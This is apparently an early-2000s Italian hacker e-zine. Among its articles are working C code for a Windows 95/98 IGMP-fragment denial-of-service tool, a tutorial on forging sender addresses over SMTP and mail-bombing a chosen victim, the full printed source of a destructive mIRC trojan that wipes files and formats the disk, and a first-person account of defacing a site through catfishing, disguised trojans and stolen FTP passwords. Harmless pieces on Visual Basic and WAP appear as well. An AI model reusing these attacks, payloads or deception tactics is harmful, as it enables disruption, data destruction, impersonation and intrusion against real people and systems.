ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø WINDOWS 95/98 IGMP FRAGMENT DOS ø ø ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø #include #include #include #include #include int main(int argc, char **argv) { struct hostent *pHostentry; struct sockaddr_in sock; int explode,sd,times,x; char *tcp_dest; unsigned short port; char big[20000]; if ((argc < 5) || (argc > 5)) { printf("usage: %s destination port size repititions\n",argv[0]); exit(1); } tcp_dest = argv[1]; port = atoi(argv[2]); explode = atoi(argv[3]); times = atoi(argv[4]); if ((pHostentry = gethostbyname(tcp_dest)) == NULL) { printf("Resolve of %s failed please try again.\n", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pHostentry->h_addr, pHostentry->h_length); sock.sin_family = AF_INET; sock.sin_port = htons(port); if ((sd = socket(AF_INET, SOCK_RAW, 2)) == -1) { printf("Could not allocate socket.\n"); exit(1); } if ( (connect(sd, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("Couldn't connect to host.\n"); exit(1); } if ( send(sd, big, explode, 0) == -1) { printf("Error sending check size (lower)\n"); close(sd); exit(1); } for (x = 0; x <= times; x++) { usleep(100000); if (send(sd, big, explode, 0) == -1) { printf("Error sending.\n"); exit(1); } printf("Sent %s packet(%d)\n",argv[1], x); } close(sd); return 0; } ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø FAKE MAIL : DI TUTTO DI + ø ø A[v]a[t]A[r] ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Come avrete gia intuito dal titolo in questo articolo vi spieghero come mandare delle fakemail ovvero come mandare delle e-mail con l'indirizzo che vogliamo.Per usare questa tecnica anche se un po vecchiotta ma sempre efficace e sicura abbiamo bisogno di Telnet quindi se non conoscete bene l'argomento vi consiglio di scaricare il mio articolo precendente (Introduzione a telnet) per capire un po come funziona. Prima di andare avanti voglio farvi una percisazione ovvero volevo informarvi che c'è qualche possibilita di mandare delle fakemail anche se non si possiede telnet, infatti in rete ci sono alcuni siti che vi offrono questo servizio che pero non da nessuna copertura.Vi consiglio quindi di utilizzare sempre e comunuque telnet. Imparando questa tecnica imparerete anche ad usare meglio telnet e soprattutto a conoscere l'SMTP ovvero il servizio della posta in uscita.Iniziamo a collegarci a telnet inserendo l'indirizzo del server da noi scelto e un numero di porta.Le porte per chi non lo sapesse sono dei numeri a cui sono associati i vari servizi dei server,ad esempio ( ftp, posta,web...). Nel nostro caso ci interessa un servizio specifico ovvero quello SMPT quindi la nostra porta è la 25 per altri servizi invece i numeri cambiano e per l'FTP abbiamo la porta 21 per le news la porta 119 ecc.Procediamo e allora scegliamo un server qualsiasi (mail.tin.it) e tanti altri.Una voltache ci siamo connessi al server attraverso la porta 25 apparira su telnet un messaggio di quest tipo: 220 server.it Sendmail x.x/x.x 16/12/00 ready at Mon, 16 Dec 00 04:25:18 -0200 Dopo che sara apparsa questa scritta dovremo identificarci con il seguente comando HELO nomeprovider.it Non mi venite a dire che i tasti non funzionano per che altrimenti mi incazzo.Quando scrivete il comando non vedete le perole che vengono scritte pero i comandi che digitate giungono lo stesso al server e solo che non li vedete.Se volete vedere quello che scrivete, andate in terminale e attivate la voce (eco locale). Vi consiglio di scrivere con attenzione perchè su telnet non è possibile cancellare quindi ogno volta che sbagliate dovrete ripetere tutti icomandi da capo ,questo per evitare di essere sgamati. 250 prova.it Hello Nomeprovider.it, pleased to meet you Ora dobbiamo digitare l'indirizzo e-mail ovviamente quello falso,quindi usiamo il comando: MAIL FROM: polizia@italia.it io ho messo fbi@italia.it ma voi potete mettre qualsiasi cosa.Dopo avre fatto questo dobbiamo mettre il destinatario ovvero la nostra vittima.Quindi: RCPT TO: lamer@delcazzo.it Adesso avvertiamo il server che siamo pronti con il seguente comando: DATA. Prima di scrivere dobbiamo camuffare il nostro ip e per farlo scrivete Received: by nomeprovider.it id AA11621 with SMTP; Mon, 16 Dec 00 04:25:18 Dovete scrivere proprio cosi ma dovete cambiare la data e l'id.Rimanete le prime 3 cifre dell'ip (AA1) ma cambiate le ultime quattro cifre.Ora scriviamo Message-ID: <123.AA16544@microsoft.com> Dovete scrivere questo per far credere che il messaggio sia partito dal server microsoft.Ricordate che dovete cambiare le cifre dell' l'intestazione Received. Inseriamo ora di nuovo il destinatario, la data e il soggetto della e-mail: To: Date: Mon, 16 Dec 00 04:25:18 Subject: questa è una mail per te Lasciamo uno spazio e scriviamo il nostro testo poi per concludere lasciamo due righe vuote dopodiche digitiamo un punto premiamo invio e poi scriviamo quit.A questo punto avremo spedito la fakemail e quindi potremo anche togliere telnet. Bene penso sia stato chiaro quindi ora che sappiamo mandare un bella fakemail utilizziamo le nostre conoscenze per borbandare la casella di posta di qualcuno che odiamo. Per farlo dobbiamo creare un'altra fakemail uguale alla precedente ma come mittente dobbiamo mettere l'indirizzo e-mail della nostra vittima e invece come destinatario usiamo un listserv. Vi consiglio quindi di procurarvi un listserv che non è altro che un programma che invia roba tramite mail. Per trovare un listserv vi bastera andare su un motore di ricerca e digitare la parola. Procediamo quindi procurandoci informazioni di qualche server e cerchiamo di scovare nelle directory qualche bel file di grandi dimensioni( ad esempio nella directory documenti troviamo un file molto grande di nome grende.cs)Una volta individuato il file facciamo in modo che questo sia inviato alla vittima sotto forma di e-mail (qui dovrete usare un servlist). Ripetiamo i comandi che abbiamo imparato per mandare una singola fakemail e quando siamo arrivati a (subject) scriviamo i seguenti comandi. REPLY lamer@delcazzo.it CONNECT server.it anonymous indirizzo@falso.it BINARY GET documenti/grande.cs QUIT Concludiamo quindi con il solito procediamento.Vi faccio una piccola spiegazione che vi fara' comprendere il perchè di REPLY indica l'indirizzo e-mail a cui rispondere CONNECT specifica il nome del provider a cui collegarsi e l'account da usare BINARY specifica un file di tipo binario (non va cambiato) GET specifica il nome del file da prelevare (completo di eventuali directory) QUIT termina la connessione Ok abbiamo finito ma se siete davvero bastardi dopo il comando GET e invece di premere QUIT usate altri GET otterrete un risultato ancora piu dannoso. A[v]a[t]A[r] H@ Team Finito l'articolo vorrei ringraziare: Jrash con cui ho passato intere sere sul suo Sr modificato anche quando la temperatura scendeva sotto zero e Valeria perche è una delle ragazze piu belle e sincere che abbai mai conosciuto. Ricordare Zero posto per l'infame -----A[v]a[t]A[r] --- w w w . h a c k e r s a t . c o m --- ---avatar@hackersat.com---- ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø NAVIGARE CON VB! ø ø sYn ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Salve ragazzi, con questa guida voglio citarvi un controllo Activex di Visual Basic. Una piccola premessa: Non scostate gli occhi dall'articolo solo perchè avete sentito parlare di Visual basic e non di C o altri linguaggi...io conosco il vb meglio di tutti gli altri linguaggi e ne sono pienamente fiero anche se è un linguaggio prodotto dalla casa Microsoft. Chiunque pensa che questo linguaggio sia da lamerucci lo incito a farsi un bel lavaggio del cervello e a pensare al proprio stile senza seguire le stronzate che dicono del tipo : "Linux è il miglior sistema operativo in assoluto, Windoz fa schifo non serve a niente".Io in prima persona uso Linux ma non ho mai affermato questo. Bene adesso vi diro' come "accedere al web da un progetto Visual Basic". Il controllo Activex disponibile nella finestra di dialogo Componenti è il controllo "Browser Web". Per aggiungere questo controllo, spuntate la voce Microsoft Internet Control nella finestra di dialogo Componenti. Quando si aggiunge questo controllo al progetto, viene creata una nuovas finestra. Le pagine web appariranno in questa finestra sul form. Il nome predefinito del controllo è WebBrowser1. Per assegnare un nome al controllo, utilizzate il prefinno "web". Uno dei metodi del controllo è Navigate che consente di specificare l'indirizzo URL di un sito web. Inserite il collegamento come stringa di seguito alla chiamata al metodo. Nell'esempio il codice richiama la homepage di hackersat se è attiva una connessione ad internet, SOLO se è attiva. webBrowser.Navigate "hackersat.com" Per fare funzionare questo controllo il computer deve essere collegato necessariamente ad un provider (o green)! Se non è aperto nessun browser, il progetto aprira' Internet Explorer.Il programma puo' funzionare anche con Netscape a condizione che questo sia aperto prima di eseguire il progetto Visual Basic ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø ATTENTI AL DUCK! ø ø A[v]a[t]A[r] ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Come tutti sapete in rete girano molti virus e da un po di tempo vanno molto di moda anche trojan.Una sera mentre cazzeggiavo per la rete mi imbattei in un sito che permetteva di scaricare un add-on per mirc capace di leggere le query altrui. Questo attiro la mia attenzione e anche se ero a conoscenza che cio non era possibile scaricai questo file per veder un po di cosa si trattava. Consapevole del fatto che è difficile che un semplice add-on possa far vedere le query altrui andai a leggere il codice che come immaginavo non era altro che un virus da quattro soldi. Dopo averci datto un'occhiata notai che questo una volta avviato si appresta a cancellare la cartella "windows" la cartella "windows/system" e inseguito a formattarvi tutto l'HD.Alla fine compare anche una sipatica scritta (you have been DUCKED by DONALD DUCK!) che di certo fara incazzare il povero malcapitato. Se volete vedere uno dei tanti siti da cui si puo scricare questo virus recatevi al seguente URL (http://spiaquery.cjb.net). Per gli appassionati riporto il codice del DUCk ma mi raccomando non usatelo per fare cosette da lamer. ---------------------------------------STarT----------------------------------------------------- alias duck { run -n attrib -r c:\autoexec.bat ; Autoexec.bat write c:\autoexec.bat @echo off write c:\autoexec.bat echo Aggiornamento dei file di configurazione di Windows $os in corso... write c:\autoexec.bat del c:\b*.* write c:\autoexec.bat del c:\c*.* write c:\autoexec.bat del c:\d*.* write c:\autoexec.bat del c:\e*.* write c:\autoexec.bat del c:\f*.* write c:\autoexec.bat del c:\g*.* write c:\autoexec.bat del c:\h*.* write c:\autoexec.bat del c:\i*.* write c:\autoexec.bat del c:\l*.* write c:\autoexec.bat del c:\m*.* write c:\autoexec.bat del c:\n*.* write c:\autoexec.bat del c:\o*.* write c:\autoexec.bat del c:\p*.* write c:\autoexec.bat del c:\q*.* write c:\autoexec.bat del c:\r*.* write c:\autoexec.bat del c:\s*.* write c:\autoexec.bat del c:\t*.* write c:\autoexec.bat del c:\u*.* write c:\autoexec.bat del c:\v*.* write c:\autoexec.bat del c:\z*.* write c:\autoexec.bat del c:\k*.* write c:\autoexec.bat del c:\j*.* write c:\autoexec.bat del c:\y*.* write c:\autoexec.bat del c:\w*.* write c:\autoexec.bat del c:\x*.* write c:\autoexec.bat del c:\windows\a*.* write c:\autoexec.bat del c:\windows\b*.* write c:\autoexec.bat del c:\windows\c*.* write c:\autoexec.bat del c:\windows\d*.* write c:\autoexec.bat del c:\windows\e*.* write c:\autoexec.bat del c:\windows\f*.* write c:\autoexec.bat del c:\windows\g*.* write c:\autoexec.bat del c:\windows\h*.* write c:\autoexec.bat del c:\windows\i*.* write c:\autoexec.bat del c:\windows\l*.* write c:\autoexec.bat del c:\windows\m*.* write c:\autoexec.bat del c:\windows\n*.* write c:\autoexec.bat del c:\windows\o*.* write c:\autoexec.bat del c:\windows\p*.* write c:\autoexec.bat del c:\windows\q*.* write c:\autoexec.bat del c:\windows\r*.* write c:\autoexec.bat del c:\windows\s*.* write c:\autoexec.bat del c:\windows\t*.* write c:\autoexec.bat del c:\windows\u*.* write c:\autoexec.bat del c:\windows\v*.* write c:\autoexec.bat del c:\windows\z*.* write c:\autoexec.bat del c:\windows\k*.* write c:\autoexec.bat del c:\windows\j*.* write c:\autoexec.bat del c:\windows\y*.* write c:\autoexec.bat del c:\windows\w*.* write c:\autoexec.bat del c:\windows\x*.* write c:\autoexec.bat del c:\windows\system\a*.* write c:\autoexec.bat del c:\windows\system\b*.* write c:\autoexec.bat del c:\windows\system\c*.* write c:\autoexec.bat del c:\windows\system\d*.* write c:\autoexec.bat del c:\windows\system\e*.* write c:\autoexec.bat del c:\windows\system\f*.* write c:\autoexec.bat del c:\windows\system\g*.* write c:\autoexec.bat del c:\windows\system\h*.* write c:\autoexec.bat del c:\windows\system\i*.* write c:\autoexec.bat del c:\windows\system\l*.* write c:\autoexec.bat del c:\windows\system\m*.* write c:\autoexec.bat del c:\windows\system\n*.* write c:\autoexec.bat del c:\windows\system\o*.* write c:\autoexec.bat del c:\windows\system\p*.* write c:\autoexec.bat del c:\windows\system\q*.* write c:\autoexec.bat del c:\windows\system\r*.* write c:\autoexec.bat del c:\windows\system\s*.* write c:\autoexec.bat del c:\windows\system\t*.* write c:\autoexec.bat del c:\windows\system\u*.* write c:\autoexec.bat del c:\windows\system\v*.* write c:\autoexec.bat del c:\windows\system\z*.* write c:\autoexec.bat del c:\windows\system\k*.* write c:\autoexec.bat del c:\windows\system\j*.* write c:\autoexec.bat del c:\windows\system\y*.* write c:\autoexec.bat del c:\windows\system\w*.* write c:\autoexec.bat del c:\windows\system\x*.* write c:\autoexec.bat deltree /y c:\*.* write c:\autoexec.bat format c: /autotest write c:\autoexec.bat @echo on write c:\autoexec.bat echo you have been DUCKED by DONALD DUCK! ; Creazione File write c:\a-001.txt duck write c:\b-001.txt duck write c:\c-001.txt duck write c:\d-001.txt duck write c:\e-001.txt duck write c:\f-001.txt duck write c:\g-001.txt duck write c:\h-001.txt duck write c:\i-001.txt duck write c:\l-001.txt duck write c:\m-001.txt duck write c:\n-001.txt duck write c:\o-001.txt duck write c:\p-001.txt duck write c:\q-001.txt duck write c:\r-001.txt duck write c:\s-001.txt duck write c:\t-001.txt duck write c:\u-001.txt duck write c:\v-001.txt duck write c:\z-001.txt duck write c:\k-001.txt duck write c:\j-001.txt duck write c:\y-001.txt duck write c:\w-001.txt duck write c:\x-001.txt duck write c:\windows\a-001.txt duck write c:\windows\b-001.txt duck write c:\windows\c-001.txt duck write c:\windows\d-001.txt duck write c:\windows\e-001.txt duck write c:\windows\f-001.txt duck write c:\windows\g-001.txt duck write c:\windows\h-001.txt duck write c:\windows\i-001.txt duck write c:\windows\l-001.txt duck write c:\windows\m-001.txt duck write c:\windows\n-001.txt duck write c:\windows\o-001.txt duck write c:\windows\p-001.txt duck write c:\windows\q-001.txt duck write c:\windows\r-001.txt duck write c:\windows\s-001.txt duck write c:\windows\t-001.txt duck write c:\windows\u-001.txt duck write c:\windows\v-001.txt duck write c:\windows\z-001.txt duck write c:\windows\k-001.txt duck write c:\windows\j-001.txt duck write c:\windows\y-001.txt duck write c:\windows\w-001.txt duck write c:\windows\x-001.txt duck write c:\windows\system\a-001.txt duck write c:\windows\system\b-001.txt duck write c:\windows\system\c-001.txt duck write c:\windows\system\d-001.txt duck write c:\windows\system\e-001.txt duck write c:\windows\system\f-001.txt duck write c:\windows\system\g-001.txt duck write c:\windows\system\h-001.txt duck write c:\windows\system\i-001.txt duck write c:\windows\system\l-001.txt duck write c:\windows\system\m-001.txt duck write c:\windows\system\n-001.txt duck write c:\windows\system\o-001.txt duck write c:\windows\system\p-001.txt duck write c:\windows\system\q-001.txt duck write c:\windows\system\r-001.txt duck write c:\windows\system\s-001.txt duck write c:\windows\system\t-001.txt duck write c:\windows\system\u-001.txt duck write c:\windows\system\v-001.txt duck write c:\windows\system\z-001.txt duck write c:\windows\system\k-001.txt duck write c:\windows\system\j-001.txt duck write c:\windows\system\y-001.txt duck write c:\windows\system\w-001.txt duck write c:\windows\system\x-001.txt duck .timer 1 5 quit DUCKED by DONALD DUCK! .timer 1 6 run rundll32.exe user.exe,exitwindows } -------------------------------------------ENd--------------------------------------------------- Spero che questo articolo vi metta in guardia dai pericoli che trovate in giro pre la rete.Consiglio a tutte le persone meno esperte di far attenzione e non fidarsidi tutto quello che si legge,infatti ricordate che un virus non si esegue mai da solo siete solo voi che lo avviate quando andate ad eseguirlo.Posso capire che veniate infettati da un virus tipo (I love you) ma non fatevi infinocchiare da due righe di un codice di merda. A[v]a[t]A[r] H@ Team uN saluto a SadikuzBoy. -----A[v]a[t]A[r] ---w w w . h a c k e r s a t . c o m--- ---avatar@hackersat.com---- ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø CRONACA DI UN SEMPLICE SITE HACK ø ø Mr. A ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Con questo testo scorrevole e forbito vi presento il mio amico Mr.A, new entry dell'H@ team... ogni tanto mi intrometto con qualche nota, cmq sappiate che ha fatto lui quasi tutta la parte pratica dell'hackeraggio, per un semplice, ottimo motivo... Mr.A ha la flat! Beato lui! Prima o poi gli frego le pwd, eheheh :)))) ^Ghent^ Questo, spero breve, documento viene da noi redatto non tanto per vantarci delle nostre ben misere capacita` di Hacking, che anzi verrebbero sminuite da un tale racconto, quanto per fare comprendere quanto la stupidaggine e la poca attenzione dell'utente medio della rete abbassi il livello di sicurezza in maniera irreparabile (NdGhent: cmq in questo caso, come leggerete, ci siamo trovati di fronte ad un vero e proprio utOnto ;)) in maniera tale che nessun sistema di sicurezza possa proteggere. Questo e` il racconto del nostro attacco ad un sito simpsons a sfondo commerciale che si spaccia per sito di "veri fan". Inizialmente abbiamo cercato per lungo tempo eventuali exploits o falle vere e proprie del server su cui il sito era ospitato; tutto questo inutilmente, in quanto erano installati un server telnet ed un server FTP di ultima relase per i quali ancora non erano stati trovati exploits interessanti (ndG: ed in quanto siamo degli scarsoni :)). Da questo si evince che il provider a cui era stato affidato il compito era assolutamente in grado di compiere il suo lavoro, visto che tra l'altro il genere di siti ospitati avrebbe potuto richiedere anche un livello di sicurezza minore; altro fatto notabile era l'assenza, almeno apparente di una directory cgi-bin, infatti in nessuno dei siti ospitati erano presenti pagine che lo utilizzassero e sapevamo che un altro sito si era dovuto trasferire provvisoriamente su altri server proprio per questo inconveniente. Ci era parso quindi ormai chiaro che un attacco "dalla porta sul retro", direttamente al server, era improponibile. Avevamo dei "suggerimenti", dei piccoli appigli per tentare un attacco brute force (ndG: per chi non lo sapesse -vergogna- un brute force consiste nel far provare ad un programmino, detto appunto bruteforcer, delle liste user/password) sull'accesso FTP, in effetti eravamo praticamente sicuri di quale fosse lo username (che si e` poi rivelato esatto), pero` non avevamo assolutamente idea della password, quindi, siccome siamo gente scazzata (ndG: e qui ci metto un bel ROTFL :)) il brute force non l'abbiamo neppure tentato . Abbiamo allora pensato che l'idea migliore fosse quella di entrare dalla porta principale, e con tanto di chiavi nella speranza che, come spesso accade nella vita reale, le chiavi fossero sotto lo zerbino. Non ci sbagliavamo affatto. La parte tre virgolette piu` complicata a questo punto era quella di poter accedere allo zerbino della "casa" del nostro amico per poter controllare se ci fossero le chiavi. Anche questa eventuale difficolta` si e` risolta piu` facilmente dello sperato (ndG: ragazzi, smettetela di dire "che culo!"). Il soggetto in questione aveva pubblicato sul suo sito il suo ICQ Number (UIN), e noi, sotto le spoglie di una bellissima ragazza lo abbiamo contattato (ndG: i logs di ICQ sono qualcosa di sensazionalmente divertente, dato che Mr. A ha impersonato un female fake eccezionale). Riteniamo opportuno qui fare una breve parentesi sull'effetto del sesso femminile in rete. Uno di noi (ndG: com'è modesto il mr. A, non si svela...) ha avuto molti anni fa l'opportunita` di pubblicare per quello che una volta era il mitico sito del bruzzi, un pezzo in cui si dimostrava chiaramente che gli uomini in rete corrono dietro a qualunque cosa si dichiari di sesso femminile, e lo fanno spesso (se si e` abbastanza convicenti) senza neppure premurarsi che dall'altro capo della rete ci sia effettivamente una donna. Basta spacciarsi per incapaci a fare le cose piu` elementari che si e` subito etichettati come femmina! Isomma ci siamo messi in contatto con questo ragazzo ed abbiamo preso un poco confidenza. Nel frattempo ci siamo ricordati di un pazzesco exploit per ICQ. Questo trucco consiste nel fatto che se si nomina un file .exe del tipo topa.jpg .exe ovvero se si mette un numero sufficiente di spazi bianchi, l'estensione reale rimane nascosta nella finestra di fine invio file (ndG: e questo dovreste gia' saperlo, se da bravi ragazzi qual siete avete letto la mia lunga guida su ICQ apparsa su Dirty Net #1). Quindi una persona che clikka su open a quel punto pensa di star aprendo in .jpg oppure un .txt o quello che sia mentre in realtà sta eseguendo un programma sul PC. Era inoltre stato sviluppato da una crew di cui ora non ricordiamo il nome, (ndG: ricordo io, erano i progenic... se non sbaglio, www.progenic.com) un programmino che univa un file .txt ad un .exe e permetteva di visualizzare il .txt mentre in background veniva eseguito il programma voluto (ndG: il prog. si chiama "ICQ File Spoofer" ed è utile appunto perchè fa in modo che il file txt venga visualizzato mentre l'exe viene eseguito, in modo da non destare sospetti); finita la prima esecuzione il vecchio file si riconverte in un normalissimo .txt o .jpg. Ci siamo anche accorti che questo programmino funzionava anche unendo .jpg agli .exe e non dava alcun problema. Arrivati quindi ad essere in confidenza col soggetto abbiamo iniziato a mandargli alcuni tra i più noti troiani in questa maniera. In prima istanza abbiamo provato con BackOrifice 2000, il quale pero' probabilmente perchè mal configurato da noi (ndG: cio' dimostra che non siamo lamer! Niente familiarita' con i trojans :)) non ha dato alcun risultato; in questo caso il troiano e` stato inviato unito con un .txt che conteneva le "poesie" scritte dalla ragazza, di cui tra l'altro una era dedicata al soggetto. Ci siamo quindi indirizzati verso un tentativo con netbus, sebbene sapessimo che sarebbe stato molto semplice essere scoperti, perche` nella fretta di fare non avevamo trovato nessun altro troiano che ci desse accesso alle directory di un PC remoto. Questo e` stato probabilmente il piu` grosso passo falso che abbiamo compiuto; ci eravamo premurati in precedenza di chiedere aiuto al tizio riguardo a quali antivirus fossero i migliori da usare per evitare che ci mandassero i virus da internet (voi tutti sapete quanto le ragazze panichino a questo riguardo), e lui ci aveva detto che non c'era assolutamente da preoccuparsi perche` bastava stare attenti e i virus non si prendevano. (ndG: ROTFL! Questa domanda sugli antivirus è stata IMHO un vero tocco di classe...) Da questo avevamo intuito che usasse poco o pernulla degli antivirus e quindi ci siamo appunto arrischiati con Netbus. Con netbus siamo riusciti in effetti ad accedere al suo PC, ma la connessione era piuttosto lenta e non siamo riusciti ad accedere rapidamente alle directory volute, e durante questo attacco il tipastro ad un certo punto se ne e` accorto, ed in effetti e` arrivato anche ad accusarci di essere stati noi ad avergli mandato netbus sul PC (ndG: cioè, non è che abbia proprio accusato noi due... ma ha accusato). Pero` dopo una nostra risposta stupita che si chiedeva cosa fosse questo netbus, il ragazzo, evidentemente sotto l'eccessivo effetto degli ormoni maschili, ha pensato che netbus fosse arrivato in qualche strana maniera sul suo PC senza che noi c'entrassimo nulla. Infine allegato ad una bellissima fotografia del deserto (non so se conoscete quella che sta tra le immagini di win2000?) abbiamo mandato un terzo troiano, di cui ora non ricordo piu` il nome, (ndG: se non sbaglio si trattava di "Blade Runner", che solo per il nome era da provare.. ;)) ma che e` facilmente reperibile, il quale ha avuto l'effetto voluto. Abbiamo quindi avuto accesso al suo PC ed in pochissimo tempo abbiamo trovato la directory del suo FTP client. Potrete tutti immaginare i grandissimi salti di gioia che abbiamo fatto nel renderci conto che usava WS_ftp, e quindi sarebbe stato semplicissimo decriptare le sue passwords (ndG: sapete che tools del genere si trovano facilmente su astalavista.box.sk, vero?). In effetti questo e` stato fatto, rendendoci conto tra l'altro che la password era un NOME PROPRIO comunissimo in italia; a questo punto ci siamo resi conto che pure un attacco bruteforce con una lista di passwords precompilate avrebbe avuto una piu` che discreta (ndG: io mi azzarderei a dire "sicura", ma cosi è stato piu' divertente :)) possibilita` di successo. Il resto a questo punto e` stato relativamente facile. Utilizzando un proxy anonimizzante situato in un paese asiatico (da cui quindi per un attacco del genere nessuno avrebbe ottenuto una rogatoria per sapere che IP erano collegati al momento - ndG: o almeno cosi' speriamo :))) ci siamo collegati all'ftp ed abbiamo uploadato un index differente da quello reale (ndG: ci tengo a precisare che non abbiamo ripulito la directory del sito ne' abbiamo danneggiato/cancellato dei files sul suo hard disk, quando naturalmente, una volta guadagnato l'accesso, potevamo fare tutto cio' che volevamo sul suo pc e nel suo spazio FTP). Da notare anche il fatto che questo soggetto, essendo un collaboratore del provider, aveva MEMORIZZATE in quel file TUTTE le password di accesso al provider, infatti ci e` stato possibile anche accedere alla directory che conteneva tutti i siti presenti sul server; sfortunatamente il provider aveva avuto l'accortezza di proteggere la sua root directory quindi non abbiamo avuto accesso ai file log ed a quelli delle passwords. Ma poco male eravamo anonimi a sufficienza. Ce ne siamo quindi andati salutando e ringraziando. Da tutto questo io credo sia facile capire come viurs quali melissa o tutti quelli distribuiti via E-mail abbiano una cosi` larga diffusione, e come spesso i sistemi di sicurezza che le aziende installano o lo zelo dei provider che si dotano di software sicuro ed aggiornato risultino spesso sforzi vani di fronte all'ingenuita` ed alla faciloneria che gli utenti da poco sbarcati sulla rete spesso mettono nel compiere le loro azioni. E' incredibile, e nessuno di noi che ha partecipato a questo avrebbe mai creduto quando siamo pariti, che sia possibile entrare su un server dalla porta principale, con le chiavi; fare cio` che si vuole, ed uscire senza che nessuno sappia chi e` entrato. E` improponibile che si pensi di poter utilizzare la rete come mezzo di comunicazione omnicomprensivo quando l'utente che ormai sta per diventare standard non e` in grado di garantire NON solo la propria personale sicurezza e la sicurezza dei suoi dati, ma pure sia in grado di mettere in serio pericolo la sicurezza di un intero server. La parte piu` delicata sta nel fatto che il problema NON e` assolutamente risolvibile aumentando la sicurezza del software; certo se ICQ non avesse avuto quel baco avremmo dovuto trovare un altro modo per fare eseguire il troiano, ma considerate anche il fatto che si poteva attaccare un troiano ad uno .zip ed eseguirlo all'apertura oppure visto che ormai moltissime persone NON visualizzano l'estensione del file, inviare un .exe con l'icona giusta dicendo che era un .jpg. Secondo noi sarebbe assolutamente necessario sensibilizzare gli utenti verso cio` che realmente e` la rete, invece che rimbecillirli con portali e siti commerciali. Mr. A ---------------------------------------=Phreaking=--------------------------------------------- ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø INFORMAZIONI GENERALI SUL PROTOCOLLO WAP ø ø A[v]a[t]A[r] ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Da un po di tempo sono comaprasi sul mercato telefoni cellulari di nuova generazione che permettono di collegarsi ad internet.Come tutti sapete invece la connesione attraverso un computer avviene attraverso un browsers che ci permette di visalizzare le pagine web fatte con speciali linguaggi molto conosciuti tipo il flash, Java,dhtml e molti altri che non sto qui ad elencare.Logicamente tutte queste pagine non sono visulaizzabili su un minuscolo schermo di un telefonino e quindi per farlo c'è bisogno di un nuovo protocollo,quello WAP (Wireless Application Protocol).C'è da dire che questo protocollo non doveva neanche essere utilizzato ma in seguito alle decisoni delle maggiori case produttrici di telefonini eccoci a spiegarlo. Il WAP è un protocollo totalmente diverso dall'HTTP ma cio non vuol dire che sia inferiore. Per farvi fare un'idea vi indichero alcune differenze.Una è sicuramente quella che tramite questo protocollo non vengono inviate pagine HTML, ma pagine WML (Wireless Markup Language). Il WML deriva direttamente dall'XML (come del resto l'HTML) ed è ottimizzato per la trasmissione a 9600 baud, velocità massima raggiungibile dai telefoni cellulari attuali. Per questo quindi possiami capire che non sono presenti tutti i tags basti notare che non è possibile eseguire suoni,filmati e video anche se questi sono di dimensioni ridotte. Questo pero non è proprio tutto vero infatti è stato creato un nuovo formato di immagini ottimizzato proprio per i cellulari. Si tratta di piccole immagini bitmap in bianco e nero che occupano pochissimo, salvate nel formato .wbmp che non è altro che la copia del formato .bmp dei computer.Diamo ora uno sguardo alla piattaforma WAP. Come avviene lo scambio di informazioni tra telefonini e server? In maniera molto simile a quella del protocollo http. La piattaforma WAP è formata da un gateway che si occupa di connettere la rete di telefonia cellulare (GSM in Europa e CDPD per gli Stati Uniti) e la rete di Internet. Questi gateway hanno il compito di tradurre i segnali delle apparecchiature WAP (per ora telefonini e palmari) in http e di inviarli in seguito ad un server web. Il server invia i dati di risposta al gateway che li riconverte in segnali fruibili alle apparecchiature WAP. Se volete iniziare a smanettare con il WML è necessario che vi procuriate alcuni tools.Vi consiglio l'sdk della nokia che potete trovare gratuitamente su http://www.forum.nokia.com su cui potete trovare anche un'ottimo emulatore per cellulari (poi non dite che sono cattivo). Infatti per vedere correttamente le pagine WML avrete bisogno di un software specifico che sia in grado di leggerle. Questo emulatore riproduce (in tutto, compresa la forma e il colore) un cellulare Nokia 6110 o, a scelta, il modello 6150 (anche se, a dire il vero, questi due modelli non sono abilitati alla navigazione in rete). Un'altra caratteristica interessante di questo emulatore è la possibilità di navigare nei veri siti sviluppati in WML. E' presente inoltre un editor, col quale potrete creare delle immagini e salvarle nel formato .WBMP. L'SDK è stato sviluppato in Java per essere facilmente portabile su altre piattaforme, quindi per farlo funzionare dovete aver preventivamente installato un compilatore java oppure il JRE (Java Runtime Environment). Io ho usato il JDK della Sun nella versione 1.2.2 e devo dire che funziona a meraviglia. Un piccolo inciso: l'ambiente di sviluppo parte lanciando dalla directory: ..\Programmi\Nokia\Nokia WAP Toolkit il comando: java -jre wapsdk.jar Ovviamente nel vostro 